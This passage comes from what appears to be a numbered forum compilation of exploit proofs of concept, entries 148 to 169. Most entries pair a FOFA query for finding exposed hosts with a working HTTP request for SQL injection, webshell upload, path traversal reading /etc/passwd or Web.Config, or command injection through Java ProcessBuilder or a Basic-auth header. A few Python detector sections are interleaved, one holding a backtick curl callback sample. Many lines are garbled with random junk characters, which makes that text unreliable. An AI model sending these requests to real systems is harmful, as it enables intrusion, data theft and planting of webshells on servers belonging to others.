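              "Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/"
              "hellothere226`curl${IFS}callback.example.invalid`;\r\n\r\n"),
    "raidenmaild": "GET /webeditor/../../../windows/win.ini HTTP/1.1\r\nHost: 127.0.0.1:81\r\n\r\n",
    "benign": ("GET /static/css/app.css?v=1.2.3 HTTP/1.1\r\nHost: x.x.x.x\r\n"
               "Cookie: SESSID=abc123; theme=dark\r\n\r\n"),
}

if __name__ == "__main__":
    for label, req in SAMPLES.items():
        print(label, traversal_findings(req))
```

The TeamCity case is the instructive one: `/res/../admin/diagnostic.jsp` never leaves the web root, so a "did it escape the root" check passes it, yet the resolved path is an admin page. Matching `..` in the raw carrier catches both kinds.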
148. CrushFTP authentication bypass (server-side template injection)
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

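Added example for entries 132 (CVE-2024-27198) and 149 to 151 above (my code; the two allow-list checks are modelled on the pattern, not copied from TeamCity or AJ-Report). In both products a `;` inside a path segment is seen by the access-control layer as part of the string it inspects, while the router drops everything after the `;` (servlet path parameters) before dispatching. The detector reports every path or path-like query value whose routed form differs from the raw one, and the two `is_public` functions contrast a substring check on the raw string with a check on the routed, normalized path. `PUBLIC_PREFIXES` is an assumed allow-list for the illustration.

```python
import posixpath
from urllib.parse import unquote_plus, urlsplit


def strip_path_params(path: str) -> str:
    """What a servlet-style router sees: each segment is cut at its first ';'
    (the path-parameter tail is dropped) and segments left empty by the cut
    vanish, so '/;swagger-ui/x' routes to '/x'."""
    kept = []
    for seg in path.split("/"):
        base = seg.split(";", 1)[0]
        if base == "" and seg != "":
            continue            # the segment was only a ';...' tail
        kept.append(base)
    return "/".join(kept)


def _query_pairs(query: str) -> list:
    """Split on '&' only; splitting on ';' would hide exactly the trick here."""
    pairs = []
    for field in query.split("&"):
        if field:
            name, _, val = field.partition("=")
            pairs.append((name, unquote_plus(val)))
    return pairs


def segment_confusion(target: str) -> list:
    """Return (location, as seen by a string filter, as routed) for the path
    and for every path-like query value whose routed form differs."""
    parts = urlsplit(target)
    findings = []
    routed = strip_path_params(parts.path)
    if routed != parts.path:
        findings.append(("path", parts.path, routed))
    for name, val in _query_pairs(parts.query):
        if val.startswith("/"):
            routed = strip_path_params(val)
            if routed != val:
                findings.append(("query:" + name, val, routed))
    return findings


# Illustrative allow-list checks (assumed prefixes, not the products' code).
PUBLIC_PREFIXES = ("/swagger-ui", "/login", "/res")


def weak_is_public(raw_path: str) -> bool:
    """The failing pattern: decide on the raw string the filter was handed."""
    return raw_path.endswith(".jsp") or "swagger-ui" in raw_path


def hardened_is_public(raw_path: str) -> bool:
    """Decide on what will actually be routed: path parameters stripped and
    dot-segments resolved, then an exact prefix match."""
    routed = posixpath.normpath(strip_path_params(raw_path))
    return any(routed == p or routed.startswith(p + "/") for p in PUBLIC_PREFIXES)


if __name__ == "__main__":
    for t in ("/pwned?jsp=/app/rest/users;.jsp",
              "/dataSetParam/verification;swagger-ui/",
              "/;swagger-ui/dataSource/pageList?pageSize=10"):
        print(t, segment_confusion(t))
```

The same `strip_path_params` plus `normpath` step also neutralizes the CVE-2024-27199 paths in entry 132, since `/res/../admin/diagnostic.jsp` resolves to `/admin/diagnostic.jsp` before the prefix test runs.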
152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
Affected: LoadMaster <= 7.2.59.2 (GA), <= 7.2.54.8 (LTSF), <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter (the injected command sits in the Basic-auth username)
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

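Added example for entries 122 and 152 above (my code, not the original post's): both PoCs wrap the injection in base64, in a query value in one case and in the Basic credential in the other, so a signature on the raw request sees nothing. The function below base64-decodes every query value and any Basic credential, keeps only plausible decodes (right length, valid alphabet, printable UTF-8), and reports SQL keywords or shell metacharacters in the result. The marker sets and the sample requests (constructed from the PoCs) are assumptions for the example.

```python
import base64
import binascii
import re
from urllib.parse import urlsplit

# Assumed marker sets for this example; tune to the application.
SQL_MARKERS = re.compile(
    r"\b(select|union|insert|update|delete|sleep|updatexml|extractvalue|"
    r"database|version|information_schema)\b", re.I)
SHELL_META = re.compile(r"[;|&`$\n]")
_B64_TOKEN = re.compile(r"[A-Za-z0-9+/]+={0,2}")


def try_base64(value: str):
    """Decode value if it is plausible base64 text, else None. A length of
    1 mod 4 can never be base64; missing padding is restored (URL handling
    often strips '='); non-UTF-8 or non-printable results are rejected."""
    token = value.strip()
    if len(token) < 4 or len(token) % 4 == 1 or not _B64_TOKEN.fullmatch(token):
        return None
    token += "=" * (-len(token) % 4)
    try:
        text = base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def _query_pairs(query: str) -> list:
    """Split on '&' and on the first '=' only, so '=' padding in a value survives."""
    pairs = []
    for field in query.split("&"):
        if field:
            name, _, val = field.partition("=")
            pairs.append((name, val))
    return pairs


def hidden_payloads(raw_request: str) -> list:
    """Base64-decode every query value and any Basic credential and report
    (location, decoded text, kinds), kinds being a subset of ['sql', 'shell'].
    Values that decode to nothing suspicious are dropped."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    target = request_line.split(" ", 2)[1]
    candidates = [("query:" + n, v) for n, v in _query_pairs(urlsplit(target).query)]
    for line in header_lines:
        name, _, val = line.partition(":")
        val = val.strip()
        if name.strip().lower() == "authorization" and val[:6].lower() == "basic ":
            candidates.append(("authorization:basic", val[6:]))
    findings = []
    for where, value in candidates:
        decoded = try_base64(value)
        if decoded is None:
            continue
        kinds = []
        if SQL_MARKERS.search(decoded):
            kinds.append("sql")
        if SHELL_META.search(decoded):
            kinds.append("shell")
        if kinds:
            findings.append((where, decoded, kinds))
    return findings


# Constructed sample requests built from the PoCs in entries 122 and 152,
# plus a benign Basic credential (admin:secret123).
SAMPLES = {
    "smart_sqli": ("GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk="
                   "&type=exportexcelbysql HTTP/1.1\r\nHost: x.x.x.x\r\n\r\n"),
    "loadmaster": ("GET /access/set?param=enableapi&value=1 HTTP/1.1\r\nHost: x.x.x.x\r\n"
                   "Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=\r\n\r\n"),
    "benign": ("GET /access/set?param=enableapi&value=1 HTTP/1.1\r\nHost: x.x.x.x\r\n"
               "Authorization: Basic YWRtaW46c2VjcmV0MTIz\r\n\r\n"),
}

if __name__ == "__main__":
    for label, req in SAMPLES.items():
        print(label, hidden_payloads(req))
```

Plain words such as `enableapi` pass the alphabet test but fail the length or UTF-8 test, which keeps the false-positive rate low enough to run this on every request rather than on a sampled subset.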
153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: have the server copy /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: fetch the copy
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianwell fire and rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

The response reveals the uploaded file, e.g. http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

, b& ]1 o) a5 y4 ^! ~* B# J156. TBK DVR-4104/DVR-4216 操作系统命令注入; g6 R: W0 N2 n) z/ F
CVE-2024-3721  k) m/ c7 x9 I! {8 n8 ~5 C5 u: ^, z
FOFA:"Location: /login.rsp"
8 }# \3 Q  @$ M8 g" w·TBK DVR-4104
3 q( G' }# Y8 O  H: z) D' o·TBK DVR-42160 K- N$ z! O4 P8 u1 H
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"  X1 P5 ^' ], `
  p+ R4 j/ c5 l" d# i
! O" C$ M& f! q2 ^0 P
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
1 {6 S8 h: l6 ?; ~3 e/ C' uHost: x.x.x.x
- [( G3 ?8 ^8 c1 l6 _User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! ]% q( M7 `% I: a" l( H
Connection: close
+ Q. S* B/ ?; X$ sContent-Length: 0
! R- W! c& u! L) E6 k; v/ OCookie: uid=1
! r) e" r0 D- H6 C2 M3 fAccept-Encoding: gzip
0 y% w- L+ L! g& t$ W) f, Q
" K& }# e. Q6 d' P; j; @/ ?7 N+ s! E0 g. M, D' f) W
157. 美特CRM (MetaCRM) upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA: body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

Uploaded file: http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp (the body above is a harmless marker string; the file keeps the submitted name).

( x6 w0 \/ _7 M9 |8 E158. Mura-CMS-processAsyncObject存在SQL注入1 u8 H( a( m8 R: P
CVE-2024-32640
5 y" I. s, _6 ?2 }  O$ K3 wFOFA:"Generator: Masa CMS"# h+ _  _3 [7 L# t, k' K  R$ N
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.19 U+ a# ~1 Z# ]  ?, u( Q/ I
Host: {{Hostname}}. W$ ^) J& ?- T7 @5 x
Content-Type: application/x-www-form-urlencoded
* ~% k7 K) B8 P- E! [+ k( o0 P0 D" U. @: c9 q* U4 x
object=displayregion&contenthistid=x\'&previewid=18 w, s% c" K7 x' Z/ T0 T

) X/ p% h/ T" C1 l6 X/ W7 O7 T
7 b! Y' N' _! e7 |/ q159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传" E; S) r, K3 `) q4 B# J, T3 I- @
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928"), O1 Y' W. v; t+ J  B& s9 ]
POST /webservices/WebJobUpload.asmx HTTP/1.1; q& v+ `4 I% o
Host: x.x.x.x
! ]0 @* B+ k) y2 e! B7 Z! W& U! MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
: G5 Q# L0 O' v/ W! `Content-Length: 1080' P% d" t8 K- I( M* h/ l
Accept-Encoding: gzip, deflate
3 k7 h' `; u. p3 E) f( b/ kConnection: close
3 h' @3 k3 [4 I9 e/ f$ OContent-Type: text/xml; charset=utf-8
! X8 O, ?( _( F# D: ^Soapaction: "http://rainier/jobUpload"2 w! W& `9 j* v

- Q5 x- b! H& p/ L' f<?xml version="1.0" encoding="utf-8"?>2 x* c' [/ Z( y( E+ ~9 C
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">+ u2 R- q- N( e  V7 z" `) y( l
<soap:Body>
& ~6 e2 [! D) R/ ]% Z6 h! b<jobUpload xmlns="http://rainier">3 q' {. m6 m" ?9 b4 r
<vcode>1</vcode>
+ Y$ U" g/ r- ^5 m& ]; I! f" `5 \<subFolder></subFolder>
' m% j( V& _0 e' e6 |3 ]( h" n<fileName>abcrce.asmx</fileName>* Q+ n8 S9 `4 W$ v' r
<bufValue>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</bufValue>4 I. {# @, S7 x
</jobUpload>8 h) ~) X0 X/ y% k3 @0 h- K% s) O
</soap:Body>' g, n+ r: _4 ?" K* q
</soap:Envelope>
3 {8 k% ~& s: h2 }1 X; D# x) c- e. {  Y% d7 K7 c9 y) y& N
4 m( U2 T( U' P3 R! h7 U6 [1 C
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World"); g0 ^$ d  w) X! g+ D5 \  u- A
: V$ Y8 d  y# q+ ~+ f' w( M

. U9 B; t  \: _$ H  B/ o160. Sonatype Nexus Repository 3目录遍历与文件读取: e$ D" y" b* V. |
CVE-2024-4956
2 J' s6 m+ |& x, A3 E  v0 l4 bFOFA:title="Nexus Repository Manager"
0 D  _4 A' M% b* h4 p# |. wGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
% r: D! b: G- S" J8 \Host: x.x.x.x4 b7 j$ C2 }2 K7 B& j
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.06 ~; z+ p" b9 k
Connection: close- l9 s9 d( ?8 ]  A
Accept: */*
4 u/ g1 Z7 @- a0 x3 _Accept-Language: en& ~- ?" t5 U4 R' l, j
Accept-Encoding: gzip  N* V# `2 l" n$ Y! I9 i

4 u5 t3 Q- a4 @- V8 \
% ^2 I" e9 o4 ?161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
  G9 ~  C& i8 Q1 q" q& u4 E9 oFOFA:body="/KT_Css/qd_defaul.css"3 W' k+ O5 W. {% L# R. E/ m, ?, L& |
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密4 `# g; j! C0 `. `" D: D& W9 r/ h
POST /Webservice.asmx HTTP/1.1
8 \1 w  L9 K4 Z5 K3 gHost: x.x.x.x
% ~: ^" M; t1 S9 m' fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
9 E3 _/ _2 o! u" B$ h" oConnection: close
; c  w' `. U& c( i+ b2 e* mContent-Length: 445
* B' ~9 t1 c1 \( |* t2 VContent-Type: text/xml
. h: v& ~; {; m, p9 j+ W9 MAccept-Encoding: gzip- J6 [# m) q% P8 F" m, u5 M
5 r7 m6 k/ }5 ^; ~* N8 d+ u) o3 T1 ]4 }
<?xml version="1.0" encoding="utf-8"?>
9 U. A8 W- ?7 H- Q5 l0 \( G: ^<soap:Envelope xmlns:xsi="
# B8 D# v% m1 z/ c7 o# Z* xhttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
8 ]0 d5 H% D5 z; p3 q- p# Txmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+ F  j% ?; Q4 I' l5 P, \: f1 U<soap:Body>
: D% Y& o) P- k# M' G$ p* p<UploadResume xmlns="http://tempuri.org/">
* Z8 N8 W7 |& Q3 n<ip>1</ip>8 N& H6 i* R% I) R
<fileName>../../../../dizxdell.aspx</fileName>0 Q; ]0 \7 b# t" j( @' M9 w: u
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>" i6 \/ N/ ^& d1 ?. w& y( j
<tag>3</tag>  E1 O3 U; b/ g5 I% v
</UploadResume>
; }. M9 l; D. W+ A6 X</soap:Body>
6 U: n4 g& Y  }3 l</soap:Envelope>
4 ~! H# M' z6 E' V* {  \) i4 D% Y8 |9 G$ H4 e% d5 M

6 i3 l7 r$ A( e5 Q. p, F5 Ohttp://x.x.x.x/dizxdell.aspx
! @1 @- r8 i. a, K2 M/ H2 a: S7 N
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

Uploaded file (the remotePath field controls the directory): http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

The JSON response of the upload handler returns the stored path of the file.

$ D7 d6 Y1 k% f& K% P3 [# n164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传7 G$ _; g8 V: u2 U
FOFA: title="智慧综合管理平台登入"8 s7 N1 I' V6 h* T7 @3 o: U; [1 j$ q1 d
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1# ^0 x+ ^6 t% c) a/ H1 N8 T! j
Host: x.x.x.x
# P' o( V/ B3 ]* x" Q9 ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
7 u! Z; s4 S- I1 KContent-Length: 2881 v* A9 m/ T8 q- j3 I. }" B. H
Accept: application/json, text/javascript, */*; q=0.01* \: _. Y' m* e) ]- o
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,' ^; T& \+ G9 h$ W4 m) ?7 P
Connection: close
2 Z* _) ^; @3 W  D1 ?1 V' ~Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
: L' r. s( e% E, {" n5 j( SX-Requested-With: XMLHttpRequest
) ~! a- U; q* g# yAccept-Encoding: gzip
4 Y5 ^( ]8 e; m5 }6 u7 x% e6 N, E0 Q# u& x# G
------dqdaieopnozbkapjacdbdthlvtlyl8 b/ [9 k8 R2 A0 {1 u
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
6 t& R" }" t( G5 A6 cContent-Type: image/jpeg
; K0 m7 c: \1 s" o
) L/ ~& S) o: ?% }$ x, P9 ^<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
: z% L& Y/ x  t; L: E------dqdaieopnozbkapjacdbdthlvtlyl--1 H' E' M! A1 Y

& V9 z! }7 R$ C/ j: S/ o+ ?  D
# L/ w) l- ?$ U5 o; E) Vhttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx' j' s. Y& G) n" S% ]4 t
% m% Z" I4 S6 c# L9 S/ f0 Q
165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL (truncated in the source post; the injection is in the sortOrder parameter):
https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

Verification: boolean-based against MySQL; changing 5240=5240 to a false condition makes the subquery return more than one row and the page errors instead of rendering the sorted list.

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA: body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host: x.x.x.x
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

Verification: error-based against MSSQL. The body decodes to ' AND 4172 IN (SELECT (CHAR(104)+CHAR(101)+CHAR(108)+CHAR(108)+CHAR(111)))-- , and the conversion error in the response contains the string "hello".

, u) l: y6 F3 f3 {167. 精益价值管理系统 DownLoad.aspx任意文件读取
/ k/ N  l; g: m, ?: ^+ RFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx", b& R9 n  u7 b/ b* H
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
! Q, k7 `. N* Z' q8 ]( B$ X5 n( E. kHost:) c0 K" Q7 h2 h. C3 O8 F% R! X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
! d4 C! q/ P$ U4 t2 o5 }Content-Type: application/x-www-form-urlencoded& s7 \! ?6 l0 Z9 @/ {( v
Accept-Encoding: gzip, deflate
! [% r# Z( p% m* j7 }+ ]: u# mAccept: */*
6 f9 L7 d5 V7 ?Connection: keep-alive
/ o& M& D6 g( ]; W, y' O! U5 K
% |1 Q* ~& B, z- ~' V% g5 x9 X2 P& B3 ?1 w; b1 m
168. 宏景EHR (HJSOFT) OutputCode arbitrary file read
FOFA: app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

The path parameter is an application-specific encoding of the target file; the value above is taken verbatim from the published PoC.

$ [& v' q" V  T" [# w169. 宏景EHR downlawbase SQL注入
8 e( j+ t9 s) q0 t: |7 NFOFA:app="HJSOFT-HCM"
( w( [2 T) y6 l  FGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.12 m6 k+ }9 h' i- z( l
Host: your-ip
" F" K% t+ J' k% p: H% jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36$ I' a8 `! d! ?" ~4 z. W
Accept: */*
4 `; b$ |# {' b* c2 {% u! E8 wAccept-Encoding: gzip, deflate, A. }0 h: S# J/ M2 y7 l: q% _
Connection: close1 t  P( ~1 |' P7 X# }

" p# m5 X  J6 [6 o& Y
